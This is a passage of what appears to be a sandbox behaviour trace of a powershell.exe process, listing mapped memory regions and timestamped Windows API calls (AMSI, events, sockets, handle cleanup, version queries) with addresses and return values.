filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 933 start_va = 0x2386dad0000 end_va = 0x2386dad0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386dad0000" filename = "" Region: id = 934 start_va = 0x7ff864cc0000 end_va = 0x7ff864e77fff monitored = 0 entry_point = 0x7ff864d2e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 935 start_va = 0x7ff868c70000 end_va = 0x7ff868ff1fff monitored = 0 entry_point = 0x7ff868cc1220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 936 start_va = 0x2386d7d0000 end_va = 0x2386d7d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386d7d0000" filename = "" Region: id = 999 start_va = 0xafa5650000 end_va = 0xafa568ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5650000" filename = "" Region: id = 1000 start_va = 0x2386dae0000 end_va = 0x2386daeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000002386dae0000" filename = "" Region: id = 1017 start_va = 0x2386dae0000 end_va = 0x2386dae1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000002386dae0000" filename = "" Region: id = 1023 start_va = 0x7ff86e2e0000 end_va = 0x7ff86e378fff monitored = 0 entry_point = 0x7ff86e30f4e0 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1048 start_va = 0xafa5690000 end_va = 0xafa56cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000afa5690000" filename = "" Thread: id = 14 os_tid = 0xa40 [0201.837] AmsiCloseSession () returned 0x7ff865db8068 [0201.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x89c [0201.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x898 [0201.837] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x80c [0201.837] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a4 [0201.837] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x8a0 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x904 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x8a8 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x91c [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x920 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x924 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x928 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x92c [0201.838] SetEvent (hEvent=0x8a4) returned 1 [0201.838] SetEvent (hEvent=0x89c) returned 1 [0201.838] SetEvent (hEvent=0x898) returned 1 [0201.838] SetEvent (hEvent=0x80c) returned 1 [0201.838] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x930 [0201.839] SetEvent (hEvent=0x5a0) returned 1 [0203.166] SetEvent (hEvent=0x8a0) returned 1 [0203.166] SetEvent (hEvent=0x904) returned 1 [0203.166] SetEvent (hEvent=0x8a8) returned 1 [0204.061] CoCreateGuid (in: pguid=0xafa427c4a8 | out: pguid=0xafa427c4a8*(Data1=0xf49aceee, Data2=0xa4d9, Data3=0x4699, Data4=([0]=0xb6, [1]=0xdc, [2]=0x54, [3]=0x7f, [4]=0x95, [5]=0xd7, [6]=0x84, [7]=0x53))) returned 0x0 [0204.135] ReportEventW (hEventLog=0x2386d490008, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x238007f4780*="Stopped", lpRawData=0x238007f45e8) returned 1 [0204.139] AmsiCloseSession () returned 0x7ff865db8068 [0204.140] AmsiUninitialize () returned 0x1 [0204.156] SetEvent (hEvent=0x5a0) returned 1 [0204.419] CloseHandle (hObject=0x5a0) returned 1 [0204.421] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0204.425] CoGetContextToken (in: pToken=0xafa427f230 | out: pToken=0xafa427f230) returned 0x0 [0204.425] CObjectContext::QueryInterface () returned 0x0 [0204.425] CObjectContext::GetCurrentThreadType () returned 0x0 [0204.425] Release () returned 0x0 [0204.427] CoGetContextToken (in: pToken=0xafa427ed40 | out: pToken=0xafa427ed40) returned 0x0 [0204.427] CObjectContext::QueryInterface () returned 0x0 [0204.427] CObjectContext::GetCurrentThreadType () returned 0x0 [0204.427] Release () returned 0x0 [0204.433] CoGetContextToken (in: pToken=0xafa427ed40 | out: pToken=0xafa427ed40) returned 0x0 [0204.441] CObjectContext::QueryInterface () returned 0x0 [0204.441] CObjectContext::GetCurrentThreadType () returned 0x0 [0204.441] Release () returned 0x0 [0204.510] CoGetContextToken (in: pToken=0xafa427ed40 | out: pToken=0xafa427ed40) returned 0x0 [0204.510] CObjectContext::QueryInterface () returned 0x0 [0204.510] CObjectContext::GetCurrentThreadType () returned 0x0 [0204.510] Release () returned 0x0 [0204.512] CoGetContextToken (in: pToken=0xafa427ed60 | out: pToken=0xafa427ed60) returned 0x0 [0204.512] CObjectContext::QueryInterface () returned 0x0 [0204.512] CObjectContext::GetCurrentThreadType () returned 0x0 [0204.512] Release () returned 0x0 [0204.513] CoUninitialize () Thread: id = 19 os_tid = 0x116c Thread: id = 20 os_tid = 0x117c Thread: id = 21 os_tid = 0x1180 [0151.762] CoGetContextToken (in: pToken=0xafa43ff9e0 | out: pToken=0xafa43ff9e0) returned 0x0 [0151.762] CoGetContextToken (in: pToken=0xafa43ff8e0 | out: pToken=0xafa43ff8e0) returned 0x0 [0151.762] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x1 [0151.763] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x0 [0151.764] RegCloseKey (hKey=0x59c) returned 0x0 [0155.983] CloseHandle (hObject=0x69c) returned 1 [0155.983] CloseHandle (hObject=0x6bc) returned 1 [0155.984] CloseHandle (hObject=0x68c) returned 1 [0155.984] CloseHandle (hObject=0x698) returned 1 [0155.984] CloseHandle (hObject=0x6a8) returned 1 [0155.984] CloseHandle (hObject=0x6b0) returned 1 [0155.984] CloseHandle (hObject=0x6a4) returned 1 [0155.985] CloseHandle (hObject=0x694) returned 1 [0155.985] CloseHandle (hObject=0x6b8) returned 1 [0155.985] CloseHandle (hObject=0x6a0) returned 1 [0155.986] CloseHandle (hObject=0x6ac) returned 1 [0160.082] CloseHandle (hObject=0x59c) returned 1 [0160.082] CertFreeCertificateContext (pCertContext=0x2386d593bc0) returned 1 [0160.083] CertFreeCertificateContext (pCertContext=0x2386d592840) returned 1 [0162.338] CertFreeCertificateContext (pCertContext=0x2386d593040) returned 1 [0162.339] CloseHandle (hObject=0x6d4) returned 1 [0192.205] CloseHandle (hObject=0x714) returned 1 [0192.206] CloseHandle (hObject=0x728) returned 1 [0192.206] CloseHandle (hObject=0x7f8) returned 1 [0192.206] CloseHandle (hObject=0x724) returned 1 [0192.206] CloseHandle (hObject=0x80c) returned 1 [0192.206] CloseHandle (hObject=0x720) returned 1 [0192.207] CloseHandle (hObject=0x71c) returned 1 [0192.207] CloseHandle (hObject=0x808) returned 1 [0192.207] CloseHandle (hObject=0x718) returned 1 [0192.207] CloseHandle (hObject=0x7fc) returned 1 [0192.208] CloseHandle (hObject=0x710) returned 1 [0200.078] CloseHandle (hObject=0x718) returned 1 [0200.078] CloseHandle (hObject=0x694) returned 1 [0200.078] CloseHandle (hObject=0x710) returned 1 [0200.079] CloseHandle (hObject=0x724) returned 1 [0200.079] CloseHandle (hObject=0x6b8) returned 1 [0200.079] CloseHandle (hObject=0x6a0) returned 1 [0200.079] CloseHandle (hObject=0x80c) returned 1 [0200.079] CloseHandle (hObject=0x71c) returned 1 [0200.079] CloseHandle (hObject=0x6ac) returned 1 [0200.080] CloseHandle (hObject=0x690) returned 1 [0200.080] CloseHandle (hObject=0x720) returned 1 [0200.080] CloseHandle (hObject=0x7f8) returned 1 [0204.428] EtwEventUnregister () returned 0x0 [0204.428] EtwEventUnregister () returned 0x0 [0204.428] EtwEventUnregister () returned 0x0 [0204.428] EtwEventUnregister () returned 0x0 [0204.429] EtwEventUnregister () returned 0x0 [0204.429] EtwEventUnregister () returned 0x0 [0204.437] LocalFree (hMem=0x2386d5bb780) returned 0x0 [0204.438] LocalFree (hMem=0x2386d5baf00) returned 0x0 [0204.450] EtwEventUnregister () returned 0x0 [0204.457] CloseHandle (hObject=0x2f8) returned 1 [0204.465] EtwEventUnregister () returned 0x0 [0204.480] CloseHandle (hObject=0x864) returned 1 [0204.481] setsockopt (s=0x774, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0204.481] closesocket (s=0x774) returned 0 [0204.482] CloseHandle (hObject=0x778) returned 1 [0204.482] setsockopt (s=0x82c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0204.482] closesocket (s=0x82c) returned 0 [0204.483] CloseHandle (hObject=0x830) returned 1 [0204.483] setsockopt (s=0x824, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0204.483] closesocket (s=0x824) returned 0 [0204.484] CloseHandle (hObject=0x828) returned 1 [0204.485] CloseHandle (hObject=0x92c) returned 1 [0204.485] CloseHandle (hObject=0x928) returned 1 [0204.486] WinHttpCloseHandle (hInternet=0x2386d707c80) returned 1 [0204.487] CloseHandle (hObject=0x924) returned 1 [0204.488] CloseHandle (hObject=0x920) returned 1 [0204.488] CloseHandle (hObject=0x7bc) returned 1 [0204.489] CloseHandle (hObject=0x598) returned 1 [0204.489] CloseHandle (hObject=0x7b8) returned 1 [0204.489] CloseHandle (hObject=0x588) returned 1 [0204.490] CloseHandle (hObject=0x594) returned 1 [0204.490] CloseHandle (hObject=0x574) returned 1 [0204.490] CloseHandle (hObject=0x57c) returned 1 [0204.491] CloseHandle (hObject=0x58c) returned 1 [0204.491] CloseHandle (hObject=0x578) returned 1 [0204.491] CloseHandle (hObject=0x584) returned 1 [0204.492] CloseHandle (hObject=0x590) returned 1 [0204.492] CloseHandle (hObject=0x570) returned 1 [0204.492] CloseHandle (hObject=0x56c) returned 1 [0204.493] CloseHandle (hObject=0x568) returned 1 [0204.493] CloseHandle (hObject=0x384) returned 1 [0204.493] RegCloseKey (hKey=0x7b4) returned 0x0 [0204.494] CloseHandle (hObject=0x7b0) returned 1 [0204.494] RegCloseKey (hKey=0x7ac) returned 0x0 [0204.495] CloseHandle (hObject=0x7a8) returned 1 [0204.495] RegCloseKey (hKey=0x7a4) returned 0x0 [0204.495] RegCloseKey (hKey=0x7a0) returned 0x0 [0204.496] CloseHandle (hObject=0x91c) returned 1 [0204.496] CloseHandle (hObject=0x8a8) returned 1 [0204.496] CloseHandle (hObject=0x904) returned 1 [0204.497] UnmapViewOfFile (lpBaseAddress=0x2386d400000) returned 1 [0204.498] CloseHandle (hObject=0x3b0) returned 1 [0204.498] CloseHandle (hObject=0x8a0) returned 1 [0204.499] DeregisterEventSource (hEventLog=0x2386d490008) returned 1 [0204.500] CloseHandle (hObject=0x8a4) returned 1 [0204.500] CloseHandle (hObject=0x80c) returned 1 [0204.501] CloseHandle (hObject=0x808) returned 1 [0204.501] CloseHandle (hObject=0x898) returned 1 [0204.502] CloseHandle (hObject=0x89c) returned 1 [0204.502] CloseHandle (hObject=0x910) returned 1 [0204.502] CloseHandle (hObject=0x930) returned 1 [0204.502] CloseHandle (hObject=0x3bc) returned 1 [0204.503] CloseHandle (hObject=0x3b8) returned 1 [0204.503] CloseHandle (hObject=0x888) returned 1 [0204.504] CloseHandle (hObject=0x714) returned 1 [0204.504] CloseHandle (hObject=0x274) returned 1 [0204.505] CloseHandle (hObject=0x728) returned 1 [0204.505] setsockopt (s=0x77c, level=65535, optname=128, optval="\x01", optlen=4) returned -1 [0204.505] closesocket (s=0x77c) returned 0 [0204.506] CloseHandle (hObject=0x780) returned 1 [0204.506] setsockopt (s=0x7fc, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0204.506] closesocket (s=0x7fc) returned 0 [0204.508] CloseHandle (hObject=0x788) returned 1 [0204.508] CloseHandle (hObject=0x26c) returned 1 [0204.509] RegCloseKey (hKey=0xffffffff80000004) returned 0x0 [0204.511] CoGetContextToken (in: pToken=0xafa43ff390 | out: pToken=0xafa43ff390) returned 0x0 [0204.511] CoGetContextToken (in: pToken=0xafa43ff290 | out: pToken=0xafa43ff290) returned 0x0 [0204.511] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x2 [0204.511] Release () returned 0x1 Thread: id = 22 os_tid = 0x10dc [0186.383] WSAEventSelect (s=0x834, hEventObject=0x0, lNetworkEvents=0) returned 0 [0186.384] ResetEvent (hEvent=0x83c) returned 1 [0186.384] setsockopt (s=0x834, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0186.384] closesocket (s=0x834) returned 0 [0186.386] FormatMessageW (in: dwFlags=0x3200, lpSource=0x0, dwMessageId=0x3e3, dwLanguageId=0x0, lpBuffer=0xafa447ea70, nSize=0x101, Arguments=0x0 | out: lpBuffer="The I/O operation has been aborted because of either a thread exit or an application request.\r\n") returned 0x5f [0186.389] CloseHandle (hObject=0x83c) returned 1 [0186.390] setsockopt (s=0x838, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0186.394] closesocket (s=0x838) returned 0 [0186.400] SetEvent (hEvent=0x864) returned 1 [0186.418] SetEvent (hEvent=0x804) returned 1 [0192.238] WSAEnumNetworkEvents (in: s=0x7fc, hEventObject=0x808, lpNetworkEvents=0xafa447f010 | out: lpNetworkEvents=0xafa447f010) returned 0 [0192.238] WSAEventSelect (s=0x7fc, hEventObject=0x0, lNetworkEvents=0) returned 0 [0192.238] ResetEvent (hEvent=0x808) returned 1 [0192.238] ioctlsocket (in: s=0x7fc, cmd=-2147195266, argp=0xafa447f040 | out: argp=0xafa447f040) returned 0 [0192.239] closesocket (s=0x718) returned 0 [0192.248] WSASend (in: s=0x7fc, lpBuffers=0x23800545838*=((len=0xaa, buf=0x2380048df10*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xafa447eb40, dwFlags=0x0, lpOverlapped=0x2380009e5b8, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xafa447eb40*=0xaa, lpOverlapped=0x2380009e5b8) returned 0 [0192.268] WSARecv (in: s=0x7fc, lpBuffers=0x23800545af0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xafa447edf0, lpFlags=0xafa447ee50*=0x0, lpOverlapped=0x2380009e548, lpCompletionRoutine=0x0 | out: lpBuffers=0x23800545af0*=((len=0x1000, buf=0x23800489d68*)), lpNumberOfBytesRecvd=0xafa447edf0*=0x0, lpFlags=0xafa447ee50*=0x0, lpOverlapped=0x2380009e548) returned 0 [0192.528] SetEvent (hEvent=0x71c) returned 1 [0192.537] SetEvent (hEvent=0x710) returned 1 [0204.473] CoGetContextToken (in: pToken=0xafa447f160 | out: pToken=0xafa447f160) returned 0x0 [0204.473] CObjectContext::QueryInterface () returned 0x0 [0204.473] CObjectContext::GetCurrentThreadType () returned 0x0 [0204.473] Release () returned 0x0 Thread: id = 23 os_tid = 0x10d8 Thread: id = 24 os_tid = 0x11e8 Thread: id = 25 os_tid = 0x121c Thread: id = 26 os_tid = 0x11fc Thread: id = 27 os_tid = 0x1224 Thread: id = 28 os_tid = 0x1214 [0148.941] SetThreadUILanguage (LangId=0x0) returned 0x409 [0149.008] CoCreateGuid (in: pguid=0xafa508ee48 | out: pguid=0xafa508ee48*(Data1=0x87082153, Data2=0x3a2d, Data3=0x4a67, Data4=([0]=0xbe, [1]=0xf7, [2]=0x5c, [3]=0xe, [4]=0xb4, [5]=0x7d, [6]=0x5c, [7]=0x33))) returned 0x0 [0149.059] GetCurrentProcessId () returned 0x10ac [0149.059] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10ac) returned 0x5ec [0149.059] EnumProcessModules (in: hProcess=0x5ec, lphModule=0x238002d2f88, cb=0x200, lpcbNeeded=0xafa508ec30 | out: lphModule=0x238002d2f88, lpcbNeeded=0xafa508ec30) returned 1 [0149.060] GetModuleInformation (in: hProcess=0x5ec, hModule=0x7ff65c960000, lpmodinfo=0x238002d31f8, cb=0x18 | out: lpmodinfo=0x238002d31f8*(lpBaseOfDll=0x7ff65c960000, SizeOfImage=0x78000, EntryPoint=0x7ff65c9631a0)) returned 1 [0149.061] CoTaskMemAlloc (cb=0x804) returned 0x2386d678eb0 [0149.061] GetModuleBaseNameW (in: hProcess=0x5ec, hModule=0x7ff65c960000, lpBaseName=0x2386d678eb0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0149.061] CoTaskMemFree (pv=0x2386d678eb0) [0149.061] CoTaskMemAlloc (cb=0x804) returned 0x2386d679ed0 [0149.061] GetModuleFileNameExW (in: hProcess=0x5ec, hModule=0x7ff65c960000, lpFilename=0x2386d679ed0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0149.061] CoTaskMemFree (pv=0x2386d679ed0) [0149.061] CloseHandle (hObject=0x5ec) returned 1 [0149.061] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10ac) returned 0x5ec [0149.061] EnumProcessModules (in: hProcess=0x5ec, lphModule=0x238002d5460, cb=0x200, lpcbNeeded=0xafa508ec30 | out: lphModule=0x238002d5460, lpcbNeeded=0xafa508ec30) returned 1 [0149.063] GetModuleInformation (in: hProcess=0x5ec, hModule=0x7ff65c960000, lpmodinfo=0x238002d56d0, cb=0x18 | out: lpmodinfo=0x238002d56d0*(lpBaseOfDll=0x7ff65c960000, SizeOfImage=0x78000, EntryPoint=0x7ff65c9631a0)) returned 1 [0149.063] CoTaskMemAlloc (cb=0x804) returned 0x2386d679ed0 [0149.063] GetModuleBaseNameW (in: hProcess=0x5ec, hModule=0x7ff65c960000, lpBaseName=0x2386d679ed0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0149.063] CoTaskMemFree (pv=0x2386d679ed0) [0149.063] CoTaskMemAlloc (cb=0x804) returned 0x2386d6786a0 [0149.063] GetModuleFileNameExW (in: hProcess=0x5ec, hModule=0x7ff65c960000, lpFilename=0x2386d6786a0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0149.063] CoTaskMemFree (pv=0x2386d6786a0) [0149.063] CloseHandle (hObject=0x5ec) returned 1 [0149.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xafa508e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0149.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xafa508eb30) returned 1 [0149.066] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"), fInfoLevelId=0x0, lpFileInformation=0xafa508ec10 | out: lpFileInformation=0xafa508ec10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2c94e9, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2c94e9, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2c94e9, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x74a00)) returned 1 [0149.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xafa508eaf0) returned 1 [0149.067] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpdwHandle=0xafa508ece8 | out: lpdwHandle=0xafa508ece8) returned 0x73c [0149.067] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", dwHandle=0x0, dwLen=0x73c, lpData=0x238002d7a50 | out: lpData=0x238002d7a50) returned 1 [0149.067] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xafa508ec68, puLen=0xafa508ec60 | out: lplpBuffer=0xafa508ec68*=0x238002d7de8, puLen=0xafa508ec60) returned 1 [0149.067] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\CompanyName", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7b08, puLen=0xafa508ec00) returned 1 [0149.067] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileDescription", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7b5c, puLen=0xafa508ec00) returned 1 [0149.067] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\FileVersion", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7ba4, puLen=0xafa508ec00) returned 1 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\InternalName", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7c14, puLen=0xafa508ec00) returned 1 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalCopyright", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7c50, puLen=0xafa508ec00) returned 1 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\OriginalFilename", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7cd4, puLen=0xafa508ec00) returned 1 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductName", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7d1c, puLen=0xafa508ec00) returned 1 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\ProductVersion", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7d8c, puLen=0xafa508ec00) returned 1 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\Comments", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x0, puLen=0xafa508ec00) returned 0 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\LegalTrademarks", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x0, puLen=0xafa508ec00) returned 0 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\PrivateBuild", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x0, puLen=0xafa508ec00) returned 0 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\\\StringFileInfo\\\\040904B0\\\\SpecialBuild", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x0, puLen=0xafa508ec00) returned 0 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xafa508ebb8, puLen=0xafa508ebb0 | out: lplpBuffer=0xafa508ebb8*=0x238002d7de8, puLen=0xafa508ebb0) returned 1 [0149.068] VerLanguageNameW (in: wLang=0x409, szLang=0xafa508e8e0, cchLang=0x100 | out: szLang="English (United States)") returned 0x17 [0149.068] VerQueryValueW (in: pBlock=0x238002d7a50, lpSubBlock="\\", lplpBuffer=0xafa508ec08, puLen=0xafa508ec00 | out: lplpBuffer=0xafa508ec08*=0x238002d7a78, puLen=0xafa508ec00) returned 1 [0149.087] AmsiInitialize () returned 0x0 [0149.115] AmsiOpenSession () returned 0x0 [0149.115] AmsiScanString () returned 0x80070015 [0149.219] EtwEventRegister () returned 0x0 [0149.220] EtwEventSetInformation () returned 0x0 [0149.234] RoGetParameterizedTypeInstanceIID () returned 0x0 [0149.235] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0149.235] Ro::detail::SimpleMetaDataBuilder::SetParameterizedInterface () returned 0x0 [0149.256] WindowsCreateStringReference () returned 0x0 [0149.256] RoGetActivationFactory () returned 0x0 [0149.258] QueryInterface () returned 0x0 [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0149.259] QueryInterface () returned 0x0 [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0149.259] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0149.259] Release () returned 0x4 [0149.259] CoGetContextToken (in: pToken=0xafa508c8a0 | out: pToken=0xafa508c8a0) returned 0x0 [0149.260] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0149.260] CoGetContextToken (in: pToken=0xafa508caf0 | out: pToken=0xafa508caf0) returned 0x0 [0149.260] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0149.260] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0149.260] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0149.260] WindowsDeleteString () returned 0x0 [0149.261] Release () returned 0x2 [0149.261] CoGetContextToken (in: pToken=0xafa508d510 | out: pToken=0xafa508d510) returned 0x0 [0149.261] CoGetContextToken (in: pToken=0xafa508d410 | out: pToken=0xafa508d410) returned 0x0 [0149.261] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0149.261] AddRef () returned 0x4 [0149.261] Release () returned 0x3 [0149.280] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0149.356] GenericStreamBase::Write () returned 0x0 [0149.356] GenericStreamBase::Write () returned 0x0 [0149.356] CoCreateGuid (in: pguid=0x7ff85558e6a0 | out: pguid=0x7ff85558e6a0*(Data1=0x2017dc57, Data2=0xec0d, Data3=0x4253, Data4=([0]=0x91, [1]=0x86, [2]=0xbb, [3]=0xb9, [4]=0x3, [5]=0xf8, [6]=0x4e, [7]=0x3c))) returned 0x0 [0149.356] GenericStreamBase::Write () returned 0x0 [0149.361] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0149.362] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x3 [0149.362] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0149.362] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0149.362] Release () returned 0x3 [0149.362] CoGetContextToken (in: pToken=0xafa508c650 | out: pToken=0xafa508c650) returned 0x0 [0149.362] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0149.365] WindowsCreateString () returned 0x0 [0149.365] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::AddRef () returned 0x4 [0149.365] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0149.365] 